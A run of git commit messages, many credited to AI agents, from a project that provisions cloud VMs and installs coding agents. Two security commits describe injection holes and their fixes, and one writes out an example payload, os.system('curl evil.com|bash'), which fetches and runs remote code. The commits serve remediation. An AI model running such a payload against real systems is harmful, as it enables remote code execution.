The bun build command was failing on proot-distro ubuntu because it couldn't
resolve node_modules dependencies. Added --packages bundle flag to explicitly
bundle all dependencies into the output file.
Fixes#209
Agent: issue-responder
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
json_escape() returns a fully-quoted JSON string (e.g. "value") via
Python's json.dumps(). Callers using printf templates were wrapping
the result in additional quotes ("%s"), producing invalid JSON like
""value"". Remove the redundant quotes from all printf format strings
so json_escape's quotes are used directly.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Replace the broken keep-alive ping loop with a fundamentally better
approach: the trigger server now streams the script's stdout/stderr
back as the HTTP response body in chunks. The GH Action holds the
curl connection open for the entire cycle duration (~90 min timeout).
This works because Sprite keeps VMs alive while "actively servicing
HTTP requests." A single long-lived streaming response satisfies
this naturally — no synthetic pings needed.
Key changes:
trigger-server.ts:
- /trigger now returns a streaming text/plain Response
- stdout/stderr piped through ReadableStream with chunked output
- 30s heartbeat lines injected during silent periods
- Client disconnect handled gracefully (process keeps running)
- X-Accel-Buffering: no header to prevent proxy buffering
discovery.yml / refactor.yml:
- curl -sSN --fail-with-body streams output in real-time
- timeout-minutes: 90 to hold the connection for full cycles
- Error responses (429/409/401) still print body and exit cleanly
discovery.sh / refactor.sh:
- Removed all keep-alive logic (start_keepalive/stop_keepalive)
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Localhost pings (curl http://localhost:8080/health) bypass the Sprite
proxy entirely and don't register as "actively servicing HTTP requests."
Per Sprite lifecycle rules, VMs pause when there's no inbound HTTP
through the proxy and no detachable session output — so the old
keep-alive was doing nothing.
Now both discovery.sh and refactor.sh resolve the Sprite's public URL
via `sprite-env info` and ping that instead. The request routes through
the Sprite proxy, which counts as real activity and prevents pause.
Also adds keep-alive to discovery.sh (previously had none at all).
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
The discovery loop was missing stale PR resolution — unlike refactor.sh,
it relied entirely on the Branch Cleaner teammate to handle open PRs
during the cycle. If the cycle timed out or the teammate failed, PRs
would leak across cycles indefinitely.
Now the team lead checks for open provider PRs at three points:
1. Pre-cycle: merge or close stale PRs (>2h old) before launching agents
2. Shutdown: explicit sweep for provider-related PRs before exiting
3. Between cycles: catch anything missed by the shutdown sequence
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Implement hyperstack/kilocode.sh script that provisions a Hyperstack VM
and installs Kilo Code with OpenRouter integration.
Agent: gap-filler-hyperstack-4
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Implement hyperstack/plandex.sh script that provisions a Hyperstack VM
and installs Plandex with OpenRouter integration.
Agent: gap-filler-hyperstack-4
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Koyeb's inject_env_vars used sed escaping that didn't handle single quotes,
allowing API key values containing ' to break out of the shell command string
passed to `koyeb instances exec`. Replace with file-based injection using
generate_env_config + upload_file, matching the safe pattern in shared/common.sh.
Hyperstack goose/gemini/interpreter/codex scripts embedded $OPENROUTER_API_KEY
directly in double-quoted command strings passed to run_server (SSH). Values
containing double quotes, backticks, or $() could execute arbitrary commands
on the remote VM. Replace with inject_env_vars_ssh which writes env vars to a
temp file, uploads via SCP, and appends to shell config without interpolation.
Also hardens Koyeb upload_file to reject remote paths containing shell
metacharacters (', $, `, newline).
Agent: security-auditor
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Validates that manifest.json is internally consistent and that every
"implemented" matrix entry has a corresponding script file. Catches
configuration drift between manifest.json and the actual file tree.
Tests cover:
- Manifest structure (agents, clouds, matrix top-level keys)
- Agent/cloud definition required fields and naming conventions
- Matrix consistency (valid statuses, complete coverage, no duplicates)
- Script file existence for all implemented entries
- Cloud lib/common.sh existence for clouds with implementations
- Script content basics (shebang, set -eo pipefail, sourcing lib)
- Orphaned script detection (files exist but marked "missing")
Agent: test-engineer
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Haiku 4.5 <noreply@anthropic.com>
Implement hyperstack/opencode.sh script that provisions a Hyperstack VM
and installs OpenCode with OpenRouter integration.
Agent: gap-filler-hyperstack-4
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Users who know their preferred cloud but not which agents are available
had no way to find out. Now `spawn hetzner` shows all agents available
on Hetzner, mirroring how `spawn claude` shows all clouds for Claude.
- Add cmdCloudInfo() showing cloud details + available agents
- handleDefaultCommand detects cloud names and routes to cloud info
- Update help text and clouds list footer to document the new command
- Bump CLI version to 0.2.15
Agent: ux-engineer
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Implements Amazon Q CLI on Hyperstack cloud provider. Uses Hyperstack's
VM provisioning API with SSH connectivity. Script installs Amazon Q CLI
via curl|bash, injects OpenRouter credentials as environment variables,
and launches interactive Q chat session.
OpenRouter integration via OPENAI_BASE_URL override pointing to
openrouter.ai/api/v1.
Agent: gap-filler-hyperstack-1
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Implement gptme agent on Hyperstack cloud platform.
- Install via pip/pip3
- Native OpenRouter support via OPENROUTER_API_KEY
- Launch with -m openrouter/${MODEL_ID} flag
- Uses Hyperstack VM provisioning and SSH primitives
- OAuth flow for API key (port 5181)
Agent: gap-filler-hyperstack-3
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
README was 4 clouds behind (missing oracle, vastai, hyperstack, koyeb).
Updated from 21→25 clouds, 294→333 combinations.
Changed discovery.sh team lead instructions: README matrix sync is now
the explicit FIRST step (before spawning teammates) and FINAL step
(after all PRs merged) — assigned to team lead, not vague "one teammate".
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Rename the GitHub workflow, scripts, and service from "improve" to
"discovery" to better reflect what the automation does. Remove the
`spawn improve` CLI command entirely — the discovery/refactor loops
are internal automation, not user-facing CLI features.
File renames:
- .github/workflows/improve.yml → discovery.yml
- .claude/skills/.../improve.sh → discovery.sh
- .claude/skills/.../start-improve.sh → start-discovery.sh
- Service: improve-trigger → discovery-trigger
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Add Koyeb as a new cloud provider with CLI-based provisioning.
Changes:
- Created koyeb/lib/common.sh with provider primitives
- Implemented koyeb/claude.sh
- Implemented koyeb/aider.sh
- Implemented koyeb/openclaw.sh
- Added Koyeb entry to manifest.json clouds section
- Added matrix entries for all 14 agents
- Created koyeb/README.md with setup instructions
Koyeb features:
- Serverless container platform with per-second billing
- Free tier available (no credit card required)
- Fast deployment times
- Automatic scaling
- Global deployment regions
Agent: cloud-scout-2
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Prevents hangs by adding cleanup traps, structured timeouts with grace
periods, prompt file management, persistent logging, checkpoint creation,
and explicit lifecycle/shutdown instructions in the agent prompt.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Sprite pauses VMs when there's no HTTP activity. During long claude API
calls, the trigger server receives no requests, causing the VM to freeze
mid-cycle. This adds a background loop that pings localhost:8080/health
every 30s to maintain HTTP activity throughout the cycle.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
When users type "spawn sprite claude" instead of "spawn claude sprite",
the CLI now detects the swap and suggests the correct order instead of
showing a confusing "Unknown agent" error. Also fixes grammar in
"spawn agents" and "spawn clouds" output (1 cloud vs 1 clouds).
Agent: ux-engineer
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
The create_vm function interpolated $environment (HYPERSTACK_ENVIRONMENT
env var or user prompt) and $image (HYPERSTACK_IMAGE env var) directly
into Python code using single-quote string literals. An attacker who
controls these env vars could break out of the string and execute
arbitrary Python code (e.g., os.system('curl evil.com|bash')).
Fix: Pass all values via stdin to Python instead of shell interpolation.
This eliminates the injection vector entirely, matching the pattern used
to fix similar issues in other providers (Scaleway, UpCloud, etc.).
Agent: security-auditor
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Break down the two longest create_server functions (104 and 102 lines)
into focused sub-functions for readability and reusability:
Scaleway (104 -> 53 lines):
- Extract _scaleway_extract_ip() for IP parsing from server response
- Extract _scaleway_power_on_and_wait() for power-on + polling loop
Fly.io (102 -> 14 lines):
- Extract _fly_create_app() for app creation with "already exists" handling
- Extract _fly_create_and_start_machine() for machine lifecycle
Also fix ((attempt++)) to attempt=$((attempt + 1)) in Fly.io to avoid
potential set -e failures when attempt is 0.
Agent: complexity-hunter
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Break down _get_subnet_id() (101 lines) and create_server() (87 lines)
into smaller, single-responsibility functions:
- _create_vcn(): VCN creation (19 lines)
- _setup_vcn_networking(): Internet gateway, route table, security list (47 lines)
- _create_subnet(): Subnet creation with AD lookup (25 lines)
- _get_subnet_id(): Now just finds or orchestrates creation (22 lines)
- _get_instance_public_ip(): VNIC lookup and IP extraction (27 lines)
- create_server(): Now delegates IP retrieval (59 lines)
Agent: complexity-hunter
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Haiku 4.5 <noreply@anthropic.com>
